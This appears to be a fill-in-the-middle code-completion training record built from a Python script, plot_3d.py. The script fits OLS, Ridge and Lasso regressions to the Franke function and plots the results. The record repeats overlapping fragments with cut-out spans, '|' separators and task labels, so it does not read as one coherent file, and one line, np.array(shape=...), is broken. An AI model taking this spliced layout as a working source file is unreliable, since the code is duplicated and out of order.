plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def | (in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| get_pow_str | identifier_name |
plot_3d.py | from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed) |
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s |
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y) | random_line_split |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
|
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
